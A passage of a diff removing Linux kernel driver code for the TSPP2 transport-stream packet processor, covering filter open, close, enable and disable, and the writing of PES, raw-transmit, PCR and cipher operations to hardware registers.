-- reg &= ~((1 << batch_id) <<
-- TSIF_INPUT_SRC_CONFIG_BATCHES_OFFS);
-- writel_relaxed(reg, src->device->base +
-- TSPP2_TSIF_INPUT_SRC_CONFIG(src->input));
-- }
--}
--
--/**
-- * tspp2_src_filters_clear() - Clear all filters from a source.
-- *
-- * @src_handle: Source to clear all filters from.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_src_filters_clear(u32 src_handle)
--{
-- int ret;
-- int i;
-- struct tspp2_filter *filter = NULL;
-- struct tspp2_filter *tmp_filter;
-- struct tspp2_filter_batch *batch = NULL;
-- struct tspp2_filter_batch *tmp_batch;
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- mutex_lock(&src->device->mutex);
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- /* Go over filters in source, disable them, clear their operations,
-- * "close" them (similar to tspp2_filter_close function but simpler).
-- * No need to worry about cases of reserved filter, so just clear
-- * filters HW- and SW-wise. Then update source's filters and batches
-- * lists and numbers. Simple :)
-- */
-- list_for_each_entry_safe(filter, tmp_filter, &src->filters_list, link) {
-- /* Disable filter */
-- writel_relaxed(0, filter->device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
-- /* Clear filter operations in HW as well as related SW fields */
-- tspp2_filter_ops_clear(filter);
-- /* Reset filter context-based counters */
-- tspp2_filter_counters_reset(filter->device, filter->context);
-- /* Reset filter context and release it back to the device */
-- tspp2_filter_context_reset(filter);
-- /* Reset filter SW fields */
-- tspp2_filter_sw_reset(filter);
--
-- list_del(&filter->link);
-- }
--
-- list_for_each_entry_safe(batch, tmp_batch, &src->batches_list, link) {
-- tspp2_src_batch_set(src, batch->batch_id, 0);
-- for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++)
-- batch->hw_filters[i] = 0;
-- batch->src = NULL;
-- list_del(&batch->link);
-- }
--
-- src->num_associated_batches = 0;
-- src->num_associated_filters = 0;
-- src->reserved_filter_hw_index = 0;
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_src_filters_clear);
--
--/* Filters and Operations API functions */
--
--/**
-- * tspp2_filter_open() - Open a new filter and add it to a source.
-- *
-- * @src_handle: Source to add the new filter to.
-- * @pid: Filter's 13-bit PID value.
-- * @mask: Filter's 13-bit mask. Note it is highly recommended
-- * to use a full bit mask of 0x1FFF, so the filter
-- * operates on a unique PID.
-- * @filter_handle: Opened filter handle.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_open(u32 src_handle, u16 pid, u16 mask, u32 *filter_handle)
--{
-- struct tspp2_src *src = (struct tspp2_src *)src_handle;
-- struct tspp2_filter_batch *batch;
-- struct tspp2_filter *filter = NULL;
-- u16 hw_idx;
-- int i;
-- u32 reg = 0;
-- int found = 0;
-- int ret;
--
-- if (!src) {
-- pr_err("%s: Invalid source handle\n", __func__);
-- return -EINVAL;
-- }
-- if (!filter_handle) {
-- pr_err("%s: Invalid filter handle pointer\n", __func__);
-- return -EINVAL;
-- }
--
-- if ((pid & ~0x1FFF) || (mask & ~0x1FFF)) {
-- pr_err("%s: Invalid PID or mask values (13 bits available)\n",
-- __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(src->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&src->device->mutex)) {
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!src->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EPERM;
-- }
--
-- if (!src->opened) {
-- pr_err("%s: Source not opened\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -EINVAL;
-- }
--
-- /* Find an available filter object in the device's filters database */
-- for (i = 0; i < TSPP2_NUM_AVAIL_FILTERS; i++)
-- if (!src->device->filters[i].opened)
-- break;
-- if (i == TSPP2_NUM_AVAIL_FILTERS) {
-- pr_err("%s: No available filters\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ENOMEM;
-- }
-- filter = &src->device->filters[i];
--
-- /* Find an available context. Each new filter needs a unique context */
-- for (i = 0; i < TSPP2_NUM_AVAIL_CONTEXTS; i++)
-- if (!src->device->contexts[i])
-- break;
-- if (i == TSPP2_NUM_AVAIL_CONTEXTS) {
-- pr_err("%s: No available filters\n", __func__);
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ENOMEM;
-- }
-- src->device->contexts[i] = 1;
-- filter->context = i;
--
-- if (src->num_associated_batches) {
-- /*
-- * Look for an available HW filter among the batches
-- * already associated with this source.
-- */
-- list_for_each_entry(batch, &src->batches_list, link) {
-- for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++) {
-- hw_idx = (batch->batch_id *
-- TSPP2_FILTERS_PER_BATCH) + i;
-- if ((hw_idx != src->reserved_filter_hw_index) &&
-- (batch->hw_filters[i] == 0))
-- break;
-- }
-- if (i < TSPP2_FILTERS_PER_BATCH) {
-- /* Found an available HW filter */
-- batch->hw_filters[i] = 1;
-- found = 1;
-- break;
-- }
-- }
-- }
--
-- if (!found) {
-- /* Either the source did not have any associated batches,
-- * or we could not find an available HW filter in any of
-- * the source's batches. In any case, we need to find a new
-- * batch. Then we use the first filter in this batch.
-- */
-- for (i = 0; i < TSPP2_NUM_BATCHES; i++) {
-- if (!src->device->batches[i].src) {
-- src->device->batches[i].src = src;
-- batch = &src->device->batches[i];
-- batch->hw_filters[0] = 1;
-- hw_idx = (batch->batch_id *
-- TSPP2_FILTERS_PER_BATCH);
-- break;
-- }
-- }
-- if (i == TSPP2_NUM_BATCHES) {
-- pr_err("%s: No available filters\n", __func__);
-- src->device->contexts[filter->context] = 0;
-- filter->context = 0;
-- mutex_unlock(&src->device->mutex);
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
-- return -ENOMEM;
-- }
--
-- tspp2_src_batch_set(src, batch->batch_id, 1);
--
-- list_add_tail(&batch->link, &src->batches_list);
--
-- /* Update reserved filter index only when needed */
-- if (src->num_associated_batches == 0) {
-- src->reserved_filter_hw_index =
-- (batch->batch_id * TSPP2_FILTERS_PER_BATCH) +
-- TSPP2_FILTERS_PER_BATCH - 1;
-- }
-- src->num_associated_batches++;
-- }
--
-- filter->opened = 1;
-- filter->src = src;
-- filter->batch = batch;
-- filter->hw_index = hw_idx;
-- filter->pid_value = pid;
-- filter->mask = mask;
-- filter->indexing_table_id = 0;
-- tspp2_filter_ops_clear(filter);
-- filter->event_callback = NULL;
-- filter->event_cookie = NULL;
-- filter->event_bitmask = 0;
-- filter->enabled = 0;
-- /* device back-pointer is already initialized, always remains valid */
--
-- list_add_tail(&filter->link, &src->filters_list);
-- src->num_associated_filters++;
--
-- /* Reset filter context-based counters */
-- tspp2_filter_counters_reset(filter->device, filter->context);
--
-- /* Reset this filter's context */
-- writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
-- filter->device->base +
-- TSPP2_TSP_CONTEXT_RESET(filter->context >> 5));
-- writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
-- filter->device->base +
-- TSPP2_PES_CONTEXT_RESET(filter->context >> 5));
-- writel_relaxed((0x1 << TSPP2_MODULUS_OP(filter->context, 32)),
-- filter->device->base +
-- TSPP2_INDEXING_CONTEXT_RESET(filter->context >> 5));
--
-- /* Write PID and mask */
-- reg = ((pid << FILTER_ENTRY0_PID_OFFS) |
-- (mask << FILTER_ENTRY0_MASK_OFFS));
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
--
-- writel_relaxed((filter->context << FILTER_ENTRY1_CONTEXT_OFFS),
-- filter->device->base + TSPP2_FILTER_ENTRY1(filter->hw_index));
--
-- *filter_handle = (u32)filter;
--
-- mutex_unlock(&src->device->mutex);
--
-- pm_runtime_mark_last_busy(src->device->dev);
-- pm_runtime_put_autosuspend(src->device->dev);
--
-- dev_dbg(src->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_open);
--
--/**
-- * tspp2_hw_filters_in_batch() - Check for used HW filters in a batch.
-- *
-- * @batch: The filter batch to check.
-- *
-- * Helper function to check if there are any HW filters used on this batch.
-- *
-- * Return 1 if found a used filter in this batch, 0 otherwise.
-- */
--static inline int tspp2_hw_filters_in_batch(struct tspp2_filter_batch *batch)
--{
-- int i;
--
-- for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++)
-- if (batch->hw_filters[i] == 1)
-- return 1;
--
-- return 0;
--}
--
--/**
-- * tspp2_filter_close() - Close a filter.
-- *
-- * @filter_handle: Filter to close.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_close(u32 filter_handle)
--{
-- int i;
-- int ret;
-- struct tspp2_device *device;
-- struct tspp2_src *src = NULL;
-- struct tspp2_filter_batch *batch = NULL;
-- struct tspp2_filter_batch *tmp_batch;
-- struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
--
-- if (!filter) {
-- pr_err("%s: Invalid filter handle\n", __func__);
-- return -EINVAL;
-- }
--
-- device = filter->device;
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- mutex_lock(&device->mutex);
--
-- if (!device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EPERM;
-- }
--
-- if (!filter->opened) {
-- pr_err("%s: Filter already closed\n", __func__);
-- mutex_unlock(&device->mutex);
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
-- return -EINVAL;
-- }
--
-- if (filter->num_user_operations)
-- pr_warn("%s: Closing filters that has %d operations\n",
-- __func__, filter->num_user_operations);
--
-- /* Disable filter */
-- writel_relaxed(0, device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
--
-- /* Clear filter operations in HW as well as related SW fields */
-- tspp2_filter_ops_clear(filter);
--
-- /* Reset filter context-based counters */
-- tspp2_filter_counters_reset(device, filter->context);
--
-- /* Reset filter context and release it back to the device */
-- tspp2_filter_context_reset(filter);
--
-- /* Mark filter as unused in batch */
-- filter->batch->hw_filters[(filter->hw_index -
-- (filter->batch->batch_id * TSPP2_FILTERS_PER_BATCH))] = 0;
--
-- /* Remove filter from source */
-- list_del(&filter->link);
-- filter->src->num_associated_filters--;
--
-- /* We may need to update the reserved filter for this source.
-- * Cases to handle:
-- * 1. This is the last filter on this source.
-- * 2. This is the last filter on this batch + reserved filter is not on
-- * this batch.
-- * 3. This is the last filter on this batch + reserved filter is on this
-- * batch. Can possibly move reserved filter to another batch if space is
-- * available.
-- * 4. This is not the last filter on this batch. The reserved filter may
-- * be the only one taking another batch and may be moved to this batch
-- * to save space.
-- */
--
-- src = filter->src;
-- /*
-- * Case #1: this could be the last filter associated with this source.
-- * If this is the case, we can release the batch too. We don't care
-- * about the reserved HW filter index, since there are no more filters.
-- */
-- if (src->num_associated_filters == 0) {
-- filter->batch->src = NULL;
-- list_del(&filter->batch->link);
-- src->num_associated_batches--;
-- tspp2_src_batch_set(src, filter->batch->batch_id, 0);
-- src->reserved_filter_hw_index = 0;
-- goto filter_clear;
-- }
--
-- /*
-- * If this is the last filter that was used in this batch, we may be
-- * able to release this entire batch. However, we have to make sure the
-- * reserved filter is not in this batch. If it is, we may find a place
-- * for it in another batch in this source.
-- */
-- if (!tspp2_hw_filters_in_batch(filter->batch)) {
-- /* There are no more used filters on this batch */
-- if ((src->reserved_filter_hw_index <
-- (filter->batch->batch_id * TSPP2_FILTERS_PER_BATCH)) ||
-- (src->reserved_filter_hw_index >=
-- ((filter->batch->batch_id * TSPP2_FILTERS_PER_BATCH) +
-- TSPP2_FILTERS_PER_BATCH))) {
-- /* Case #2: the reserved filter is not on this batch */
-- filter->batch->src = NULL;
-- list_del(&filter->batch->link);
-- src->num_associated_batches--;
-- tspp2_src_batch_set(src, filter->batch->batch_id, 0);
-- } else {
-- /*
-- * Case #3: see if we can "move" the reserved filter to
-- * a different batch.
-- */
-- list_for_each_entry_safe(batch, tmp_batch,
-- &src->batches_list, link) {
-- if (batch == filter->batch)
-- continue;
--
-- for (i = 0; i < TSPP2_FILTERS_PER_BATCH; i++) {
-- if (batch->hw_filters[i] == 0) {
-- src->reserved_filter_hw_index =
-- (batch->batch_id *
-- TSPP2_FILTERS_PER_BATCH)
-- + i;
--
-- filter->batch->src = NULL;
-- list_del(&filter->batch->link);
-- src->num_associated_batches--;
-- tspp2_src_batch_set(src,
-- filter->batch->batch_id,
-- 0);
-- goto filter_clear;
-- }
-- }
-- }
-- }
-- } else {
-- /* Case #4: whenever we remove a filter, there is always a
-- * chance that the reserved filter was the only filter used on a
-- * different batch. So now this is a good opportunity to check
-- * if we can release that batch and use the index of the filter
-- * we're freeing instead.
-- */
-- list_for_each_entry_safe(batch, tmp_batch,
-- &src->batches_list, link) {
-- if (((src->reserved_filter_hw_index >=
-- (batch->batch_id * TSPP2_FILTERS_PER_BATCH)) &&
-- (src->reserved_filter_hw_index <
-- (batch->batch_id * TSPP2_FILTERS_PER_BATCH +
-- TSPP2_FILTERS_PER_BATCH))) &&
-- !tspp2_hw_filters_in_batch(batch)) {
-- src->reserved_filter_hw_index =
-- filter->hw_index;
-- batch->src = NULL;
-- list_del(&batch->link);
-- src->num_associated_batches--;
-- tspp2_src_batch_set(src, batch->batch_id, 0);
-- break;
-- }
-- }
-- }
--
--filter_clear:
-- tspp2_filter_sw_reset(filter);
--
-- mutex_unlock(&device->mutex);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- dev_dbg(device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_close);
--
--/**
-- * tspp2_filter_enable() - Enable a filter.
-- *
-- * @filter_handle: Filter to enable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_enable(u32 filter_handle)
--{
-- struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
-- u32 reg;
-- int ret;
--
-- if (!filter) {
-- pr_err("%s: Invalid filter handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(filter->device->dev);
-- if (ret < 0)
-- return ret;
--
-- if (mutex_lock_interruptible(&filter->device->mutex)) {
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -ERESTARTSYS;
-- }
--
-- if (!filter->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EPERM;
-- }
--
-- if (!filter->opened) {
-- pr_err("%s: Filter not opened\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EINVAL;
-- }
--
-- if (filter->enabled) {
-- pr_warn("%s: Filter already enabled\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return 0;
-- }
--
-- reg = readl_relaxed(filter->device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
-- reg |= (0x1 << FILTER_ENTRY0_EN_OFFS);
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
--
-- filter->enabled = 1;
--
-- mutex_unlock(&filter->device->mutex);
--
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_enable);
--
--/**
-- * tspp2_filter_disable() - Disable a filter.
-- *
-- * @filter_handle: Filter to disable.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--int tspp2_filter_disable(u32 filter_handle)
--{
-- struct tspp2_filter *filter = (struct tspp2_filter *)filter_handle;
-- u32 reg;
-- int ret;
--
-- if (!filter) {
-- pr_err("%s: Invalid filter handle\n", __func__);
-- return -EINVAL;
-- }
--
-- ret = pm_runtime_get_sync(filter->device->dev);
-- if (ret < 0)
-- return ret;
--
-- mutex_lock(&filter->device->mutex);
--
-- if (!filter->device->opened) {
-- pr_err("%s: Device must be opened first\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EPERM;
-- }
--
-- if (!filter->opened) {
-- pr_err("%s: Filter not opened\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return -EINVAL;
-- }
--
-- if (!filter->enabled) {
-- pr_warn("%s: Filter already disabled\n", __func__);
-- mutex_unlock(&filter->device->mutex);
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
-- return 0;
-- }
--
-- reg = readl_relaxed(filter->device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
-- reg &= ~(0x1 << FILTER_ENTRY0_EN_OFFS);
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_FILTER_ENTRY0(filter->hw_index));
--
-- /*
-- * HW requires we wait for up to 2ms here before closing the pipes
-- * used by this filter
-- */
-- udelay(TSPP2_HW_DELAY_USEC);
--
-- filter->enabled = 0;
--
-- mutex_unlock(&filter->device->mutex);
--
-- pm_runtime_mark_last_busy(filter->device->dev);
-- pm_runtime_put_autosuspend(filter->device->dev);
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--EXPORT_SYMBOL(tspp2_filter_disable);
--
--/**
-- * tspp2_pes_analysis_op_write() - Write a PES Analysis operation.
-- *
-- * @filter: The filter to set the operation to.
-- * @op: The operation.
-- * @op_index: The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_pes_analysis_op_write(struct tspp2_filter *filter,
-- const struct tspp2_operation *op,
-- u8 op_index)
--{
-- u32 reg = 0;
--
-- if (filter->mask != TSPP2_UNIQUE_PID_MASK) {
-- pr_err(
-- "%s: A filter with a PES Analysis operation must handle a unique PID\n",
-- __func__);
-- return -EINVAL;
-- }
--
-- /*
-- * Bits[19:6] = 0, Bit[5] = Source,
-- * Bit[4] = Skip, Bits[3:0] = Opcode
-- */
-- reg |= TSPP2_OPCODE_PES_ANALYSIS;
-- if (op->params.pes_analysis.skip_ts_errs)
-- reg |= (0x1 << 4);
--
-- if (op->params.pes_analysis.input == TSPP2_OP_BUFFER_B)
-- reg |= (0x1 << 5);
--
-- filter->pes_analysis_op_set = 1;
--
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_OPCODE(filter->hw_index, op_index));
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_raw_tx_op_write() - Write a RAW Transmit operation.
-- *
-- * @filter: The filter to set the operation to.
-- * @op: The operation.
-- * @op_index: The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_raw_tx_op_write(struct tspp2_filter *filter,
-- const struct tspp2_operation *op,
-- u8 op_index)
--{
-- u32 reg = 0;
-- int timestamp = 0;
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)
-- op->params.raw_transmit.output_pipe_handle;
--
-- if (!pipe || !pipe->opened) {
-- pr_err("%s: Invalid pipe handle\n", __func__);
-- return -EINVAL;
-- }
--
-- /*
-- * Bits[19:16] = 0, Bit[15] = Support Indexing,
-- * Bit[14] = Timestamp position,
-- * Bits[13:12] = Timestamp mode,
-- * Bits[11:6] = Output pipe, Bit[5] = Source,
-- * Bit[4] = Skip, Bits[3:0] = Opcode
-- */
-- reg |= TSPP2_OPCODE_RAW_TRANSMIT;
-- if (op->params.raw_transmit.skip_ts_errs)
-- reg |= (0x1 << 4);
--
-- if (op->params.raw_transmit.input == TSPP2_OP_BUFFER_B)
-- reg |= (0x1 << 5);
--
-- reg |= ((pipe->hw_index & 0x3F) << 6);
--
-- switch (op->params.raw_transmit.timestamp_mode) {
-- case TSPP2_OP_TIMESTAMP_NONE:
-- /* nothing to do, keep bits value as 0 */
-- break;
-- case TSPP2_OP_TIMESTAMP_ZERO:
-- reg |= (0x1 << 12);
-- timestamp = 1;
-- break;
-- case TSPP2_OP_TIMESTAMP_STC:
-- reg |= (0x2 << 12);
-- timestamp = 1;
-- break;
-- default:
-- pr_err("%s: Invalid timestamp mode\n", __func__);
-- return -EINVAL;
-- }
--
-- if (timestamp && op->params.raw_transmit.timestamp_position ==
-- TSPP2_PACKET_FORMAT_188_RAW) {
-- pr_err("%s: Invalid timestamp position\n", __func__);
-- return -EINVAL;
-- }
--
-- if (op->params.raw_transmit.timestamp_position ==
-- TSPP2_PACKET_FORMAT_192_TAIL)
-- reg |= (0x1 << 14);
--
-- if (op->params.raw_transmit.support_indexing) {
-- if (filter->raw_op_with_indexing) {
-- pr_err(
-- "%s: Only one Raw Transmit operation per filter can support HW indexing\n",
-- __func__);
-- return -EINVAL;
-- }
-- filter->raw_op_with_indexing = 1;
-- reg |= (0x1 << 15);
-- }
--
-- filter->raw_op_set = 1;
--
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_OPCODE(filter->hw_index, op_index));
--
-- dev_dbg(filter->device->dev, "%s: successful\n",
__func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_pes_tx_op_write() - Write a PES Transmit operation.
-- *
-- * @filter: The filter to set the operation to.
-- * @op: The operation.
-- * @op_index: The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_pes_tx_op_write(struct tspp2_filter *filter,
-- const struct tspp2_operation *op,
-- u8 op_index)
--{
-- u32 reg = 0;
-- struct tspp2_pipe *payload_pipe = (struct tspp2_pipe *)
-- op->params.pes_transmit.output_pipe_handle;
-- struct tspp2_pipe *header_pipe;
--
-- if (!payload_pipe || !payload_pipe->opened) {
-- pr_err("%s: Invalid payload pipe handle\n", __func__);
-- return -EINVAL;
-- }
--
-- if (!filter->pes_analysis_op_set) {
-- pr_err(
-- "%s: PES Analysys operation must precede any PES Transmit operation\n",
-- __func__);
-- return -EINVAL;
-- }
--
-- /*
-- * Bits[19:18] = 0, Bits[17:12] = PES Header output pipe,
-- * Bits[11:6] = Output pipe, Bit[5] = Source,
-- * Bit[4] = Attach STC and flags,
-- * Bit[3] = Disable TX on PES discontinuity,
-- * Bit[2] = Enable SW indexing, Bit[1] = Mode, Bit[0] = 0
-- */
--
-- if (op->params.pes_transmit.mode == TSPP2_OP_PES_TRANSMIT_FULL) {
-- reg |= (0x1 << 1);
-- } else {
-- /* Separated PES mode requires another pipe */
-- header_pipe = (struct tspp2_pipe *)
-- op->params.pes_transmit.header_output_pipe_handle;
--
-- if (!header_pipe || !header_pipe->opened) {
-- pr_err("%s: Invalid header pipe handle\n", __func__);
-- return -EINVAL;
-- }
--
-- reg |= ((header_pipe->hw_index & 0x3F) << 12);
-- }
--
-- if (op->params.pes_transmit.enable_sw_indexing) {
-- if (!filter->raw_op_set) {
-- pr_err(
-- "%s: PES Transmit operation with SW indexing must be preceded by a Raw Transmit operation\n",
-- __func__);
-- return -EINVAL;
-- }
-- reg |= (0x1 << 2);
-- }
--
-- if (op->params.pes_transmit.disable_tx_on_pes_discontinuity)
-- reg |= (0x1 << 3);
--
-- if (op->params.pes_transmit.attach_stc_flags)
-- reg |= (0x1 <<
4);
--
-- if (op->params.pes_transmit.input == TSPP2_OP_BUFFER_B)
-- reg |= (0x1 << 5);
--
-- reg |= ((payload_pipe->hw_index & 0x3F) << 6);
--
-- filter->pes_tx_op_set = 1;
--
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_OPCODE(filter->hw_index, op_index));
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_pcr_op_write() - Write a PCR Extraction operation.
-- *
-- * @filter: The filter to set the operation to.
-- * @op: The operation.
-- * @op_index: The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_pcr_op_write(struct tspp2_filter *filter,
-- const struct tspp2_operation *op,
-- u8 op_index)
--{
-- u32 reg = 0;
-- struct tspp2_pipe *pipe = (struct tspp2_pipe *)
-- op->params.pcr_extraction.output_pipe_handle;
--
-- if (!pipe || !pipe->opened) {
-- pr_err("%s: Invalid pipe handle\n", __func__);
-- return -EINVAL;
-- }
--
-- if (!op->params.pcr_extraction.extract_pcr &&
-- !op->params.pcr_extraction.extract_opcr &&
-- !op->params.pcr_extraction.extract_splicing_point &&
-- !op->params.pcr_extraction.extract_transport_private_data &&
-- !op->params.pcr_extraction.extract_af_extension &&
-- !op->params.pcr_extraction.extract_all_af) {
-- pr_err("%s: Invalid extraction parameters\n", __func__);
-- return -EINVAL;
-- }
--
-- /*
-- * Bits[19:18] = 0, Bit[17] = All AF, Bit[16] = AF Extension,
-- * Bit[15] = Transport Priave Data, Bit[14] = Splicing Point,
-- * Bit[13] = OPCR, Bit[12] = PCR, Bits[11:6] = Output pipe,
-- * Bit[5] = Source, Bit[4] = Skip, Bits[3:0] = Opcode
-- */
-- reg |= TSPP2_OPCODE_PCR_EXTRACTION;
-- if (op->params.pcr_extraction.skip_ts_errs)
-- reg |= (0x1 << 4);
--
-- if (op->params.pcr_extraction.input == TSPP2_OP_BUFFER_B)
-- reg |= (0x1 << 5);
--
-- reg |= ((pipe->hw_index & 0x3F) << 6);
--
-- if (op->params.pcr_extraction.extract_pcr)
-- reg |= (0x1 << 12);
--
-- if (op->params.pcr_extraction.extract_opcr)
-- reg |=
(0x1 << 13);
--
-- if (op->params.pcr_extraction.extract_splicing_point)
-- reg |= (0x1 << 14);
--
-- if (op->params.pcr_extraction.extract_transport_private_data)
-- reg |= (0x1 << 15);
--
-- if (op->params.pcr_extraction.extract_af_extension)
-- reg |= (0x1 << 16);
--
-- if (op->params.pcr_extraction.extract_all_af)
-- reg |= (0x1 << 17);
--
-- writel_relaxed(reg, filter->device->base +
-- TSPP2_OPCODE(filter->hw_index, op_index));
--
-- dev_dbg(filter->device->dev, "%s: successful\n", __func__);
--
-- return 0;
--}
--
--/**
-- * tspp2_cipher_op_write() - Write a Cipher operation.
-- *
-- * @filter: The filter to set the operation to.
-- * @op: The operation.
-- * @op_index: The operation's index in this filter.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tspp2_cipher_op_write(struct tspp2_filter *filter,
-- const struct tspp2_operation *op,
-- u8 op_index)
--{
-- u32 reg = 0;
--
-- /*
-- * Bits[19:18] = 0, Bits[17:15] = Scrambling related,
-- * Bit[14] = Mode, Bit[13] = Decrypt PES header,
-- * Bits[12:7] = Key ladder index, Bit[6] = Destination,
-- * Bit[5] = Source, Bit[4] = Skip, Bits[3:0] = Opcode
-- */
--
-- reg |= TSPP2_OPCODE_CIPHER;
-- if (op->params.cipher.skip_ts_errs)
-- reg |= (0x1 << 4);
--
-- if (op->params.cipher.input == TSPP2_OP_BUFFER_B)
-- reg |= (0x1 << 5);
--
-- if (op->params.cipher.output == TSPP2_OP_BUFFER_B)
-- reg |= (0x1 << 6);
--
-- reg |= ((op->params.cipher.key_ladder_index & 0x3F) << 7);
--
-- if (op->params.cipher.mode == TSPP2_OP_CIPHER_ENCRYPT &&
-- op->params.cipher.decrypt_pes_header) {
-- pr_err("%s: Invalid parameters\n", __func__);
-- return -EINVAL;
-- }
--
-- if (op->params.cipher.decrypt_pes_header)
-- reg |= (0x1 << 13);
--
-- if (op->params.cipher.mode == TSPP2_OP_CIPHER_ENCRYPT)
-- reg |= (0x1 << 14);
--
-- switch (op->params.cipher.scrambling_mode) {
-- case TSPP2_OP_CIPHER_AS_IS:
-- reg |= (0x1 << 15);
-- break;
-- case TSPP2_OP_CIPHER_SET_SCRAMBLING_0:
-- /* nothing to do, keep
bits[17:16] as 0 */
-- break;
-- case TSPP2_OP_CIPHER_SET_SCRAMBLING_1:
-- reg |= (0x1 << 16);
-- break;
-- case TSPP2_OP_CIPHER_SET_SCRAMBLING_2:
-- reg |= (0x2 << 16);
-- break;
